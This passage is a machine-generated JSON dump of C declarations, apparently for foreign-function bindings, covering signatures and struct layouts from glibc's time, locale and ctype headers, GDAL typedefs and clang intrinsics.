"location": "/usr/include/ctype.h:261:1 <Spelling=/usr/include/ctype.h:261:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isblank_l", "ns": 0, "location": "/usr/include/ctype.h:263:1 <Spelling=/usr/include/ctype.h:263:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tolower_l", "ns": 0, "location": "/usr/include/ctype.h:267:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tolower_l", "ns": 0, "location": "/usr/include/ctype.h:268:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__toupper_l", "ns": 0, "location": "/usr/include/ctype.h:271:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "toupper_l", "ns": 0, "location": "/usr/include/ctype.h:272:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__c", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__l", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "struct", "ns": 0, "name": "tm", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_tm.h:7:8", "bit-size": 448, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "tm_sec", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_min", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_hour", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_mday", "bit-offset": 96, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_mon", "bit-offset": 128, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_year", "bit-offset": 160, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_wday", "bit-offset": 192, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_yday", "bit-offset": 224, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_isdst", "bit-offset": 256, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "tm_gmtoff", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "tm_zone", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }] }, { "tag": "struct", "ns": 0, "name": "itimerspec", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_itimerspec.h:8:8", "bit-size": 256, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "it_interval", "bit-offset": 0, "bit-size": 128, "bit-alignment": 64, "type": { "tag": ":struct", "name": "timespec", "id": 18 } }, { "tag": "field", "name": "it_value", "bit-offset": 128, "bit-size": 128, "bit-alignment": 64, "type": { "tag": ":struct", "name": "timespec", "id": 18 } }] }, { "tag": "struct", "ns": 0, "name": "sigevent", "id": 0, "location": "/usr/include/time.h:49:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "function", "name": "clock", "ns": 0, "location": "/usr/include/time.h:72:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": "clock_t" } }, { "tag": "function", "name": "time", "ns": 0, "location": "/usr/include/time.h:75:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }], "return-type": { "tag": "time_t" } }, { "tag": "function", "name": "difftime", "ns": 0, "location": "/usr/include/time.h:78:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__time1", "type": { "tag": "time_t" } }, { "tag": "parameter", "name": "__time0", "type": { "tag": "time_t" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "mktime", "ns": 0, "location": "/usr/include/time.h:82:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": "time_t" } }, { "tag": "function", "name": "strftime", "ns": 0, "location": "/usr/include/time.h:88:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__maxsize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "strftime_l", "ns": 0, "location": "/usr/include/time.h:104:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__maxsize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__format", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "parameter", "name": "__loc", "type": { "tag": "locale_t" } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "gmtime", "ns": 0, "location": "/usr/include/time.h:119:19", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "function", "name": "localtime", "ns": 0, "location": "/usr/include/time.h:123:19", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "function", "name": "gmtime_r", "ns": 0, "location": "/usr/include/time.h:128:19", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "function", "name": "localtime_r", "ns": 0, "location": "/usr/include/time.h:133:19", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "function", "name": "asctime", "ns": 0, "location": "/usr/include/time.h:139:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "ctime", "ns": 0, "location": "/usr/include/time.h:142:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "asctime_r", "ns": 0, "location": "/usr/include/time.h:149:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "ctime_r", "ns": 0, "location": "/usr/include/time.h:153:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timer", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "extern", "name": "__tzname", "ns": 0, "location": "/usr/include/time.h:159:14", "type": { "tag": ":array", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "size": 2 } }, { "tag": "extern", "name": "__daylight", "ns": 0, "location": "/usr/include/time.h:160:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "__timezone", "ns": 0, "location": "/usr/include/time.h:161:17", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "extern", "name": "tzname", "ns": 0, "location": "/usr/include/time.h:166:14", "type": { "tag": ":array", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "size": 2 } }, { "tag": "function", "name": "tzset", "ns": 0, "location": "/usr/include/time.h:170:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "extern", "name": "daylight", "ns": 0, "location": "/usr/include/time.h:174:12", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "timezone", "ns": 0, "location": "/usr/include/time.h:175:17", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "stime", "ns": 0, "location": "/usr/include/time.h:181:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__when", "type": { "tag": ":pointer", "type": { "tag": "time_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timegm", "ns": 0, "location": "/usr/include/time.h:196:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": "time_t" } }, { "tag": "function", "name": "timelocal", "ns": 0, "location": "/usr/include/time.h:199:15", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "tm", "id": 42 } } }], "return-type": { "tag": "time_t" } }, { "tag": "function", "name": "dysize", "ns": 0, "location": "/usr/include/time.h:202:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__year", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nanosleep", "ns": 0, "location": "/usr/include/time.h:211:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__requested_time", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }, { "tag": "parameter", "name": "__remaining", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clock_getres", "ns": 0, "location": "/usr/include/time.h:216:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__clock_id", "type": { "tag": "clockid_t" } }, { "tag": "parameter", "name": "__res", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clock_gettime", "ns": 0, "location": "/usr/include/time.h:219:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__clock_id", "type": { "tag": "clockid_t" } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clock_settime", "ns": 0, "location": "/usr/include/time.h:222:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__clock_id", "type": { "tag": "clockid_t" } }, { "tag": "parameter", "name": "__tp", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clock_nanosleep", "ns": 0, "location": "/usr/include/time.h:230:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__clock_id", "type": { "tag": "clockid_t" } }, { "tag": "parameter", "name": "__flags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__req", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }, { "tag": "parameter", "name": "__rem", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "clock_getcpuclockid", "ns": 0, "location": "/usr/include/time.h:235:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pid", "type": { "tag": "pid_t" } }, { "tag": "parameter", "name": "__clock_id", "type": { "tag": ":pointer", "type": { "tag": "clockid_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timer_create", "ns": 0, "location": "/usr/include/time.h:240:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__clock_id", "type": { "tag": "clockid_t" } }, { "tag": "parameter", "name": "__evp", "type": { "tag": ":pointer", "type": { "tag": "struct", "ns": 0, "name": "sigevent", "id": 0, "location": "/usr/include/time.h:49:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } } }, { "tag": "parameter", "name": "__timerid", "type": { "tag": ":pointer", "type": { "tag": "timer_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timer_delete", "ns": 0, "location": "/usr/include/time.h:245:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timerid", "type": { "tag": "timer_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timer_settime", "ns": 0, "location": "/usr/include/time.h:248:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timerid", "type": { "tag": "timer_t" } }, { "tag": "parameter", "name": "__flags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__value", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "itimerspec", "id": 44 } } }, { "tag": "parameter", "name": "__ovalue", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "itimerspec", "id": 44 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timer_gettime", "ns": 0, "location": "/usr/include/time.h:253:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timerid", "type": { "tag": "timer_t" } }, { "tag": "parameter", "name": "__value", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "itimerspec", "id": 44 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timer_getoverrun", "ns": 0, "location": "/usr/include/time.h:257:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__timerid", "type": { "tag": "timer_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "timespec_get", "ns": 0, "location": "/usr/include/time.h:263:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__ts", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }, { "tag": "parameter", "name": "__base", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__errno_location", "ns": 0, "location": "/usr/include/errno.h:37:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "struct", "ns": 0, "name": "lconv", "id": 0, "location": "/usr/include/locale.h:51:8", "bit-size": 768, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "decimal_point", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "thousands_sep", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "grouping", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "int_curr_symbol", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "currency_symbol", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "mon_decimal_point", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "mon_thousands_sep", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "mon_grouping", "bit-offset": 448, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "positive_sign", "bit-offset": 512, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "negative_sign", "bit-offset": 576, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "field", "name": "int_frac_digits", "bit-offset": 640, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "frac_digits", "bit-offset": 648, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "p_cs_precedes", "bit-offset": 656, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "p_sep_by_space", "bit-offset": 664, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "n_cs_precedes", "bit-offset": 672, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "n_sep_by_space", "bit-offset": 680, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "p_sign_posn", "bit-offset": 688, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "n_sign_posn", "bit-offset": 696, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_p_cs_precedes", "bit-offset": 704, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_p_sep_by_space", "bit-offset": 712, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_n_cs_precedes", "bit-offset": 720, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_n_sep_by_space", "bit-offset": 728, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_p_sign_posn", "bit-offset": 736, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "int_n_sign_posn", "bit-offset": 744, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }] }, { "tag": "function", "name": "setlocale", "ns": 0, "location": "/usr/include/locale.h:122:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__category", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__locale", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "localeconv", "ns": 0, "location": "/usr/include/locale.h:125:22", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "lconv", "id": 45 } } }, { "tag": "function", "name": "newlocale", "ns": 0, "location": "/usr/include/locale.h:141:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__category_mask", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__locale", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__base", "type": { "tag": "locale_t" } }], "return-type": { "tag": "locale_t" } }, { "tag": "function", "name": "duplocale", "ns": 0, "location": "/usr/include/locale.h:176:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dataset", "type": { "tag": "locale_t" } }], "return-type": { "tag": "locale_t" } }, { "tag": "function", "name": "freelocale", "ns": 0, "location": "/usr/include/locale.h:180:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dataset", "type": { "tag": "locale_t" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "uselocale", "ns": 0, "location": "/usr/include/locale.h:187:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__dataset", "type": { "tag": "locale_t" } }], "return-type": { "tag": "locale_t" } }, { "tag": "typedef", "ns": 0, "name": "GInt32", "location": "/usr/include/gdal/cpl_port.h:205:25", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "GUInt32", "location": "/usr/include/gdal/cpl_port.h:207:25", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "GInt16", "location": "/usr/include/gdal/cpl_port.h:211:25", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "GUInt16", "location": "/usr/include/gdal/cpl_port.h:213:25", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "GByte", "location": "/usr/include/gdal/cpl_port.h:215:25", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "typedef", "ns": 0, "name": "GBool", "location": "/usr/include/gdal/cpl_port.h:223:25", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "GIntBig", "location": "/usr/include/gdal/cpl_port.h:248:26", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "GUIntBig", "location": "/usr/include/gdal/cpl_port.h:251:28", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "GInt64", "location": "/usr/include/gdal/cpl_port.h:267:26", "type": { "tag": "GIntBig" } }, { "tag": "typedef", "ns": 0, "name": "GUInt64", "location": "/usr/include/gdal/cpl_port.h:269:26", "type": { "tag": "GUIntBig" } }, { "tag": "typedef", "ns": 0, "name": "GPtrDiff_t", "location": "/usr/include/gdal/cpl_port.h:286:26", "type": { "tag": "GIntBig" } }, { "tag": "function", "name": "__bsfd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bsrd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bswapd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:63:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_bswap", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bsfq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:89:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bsrq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bswapq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, 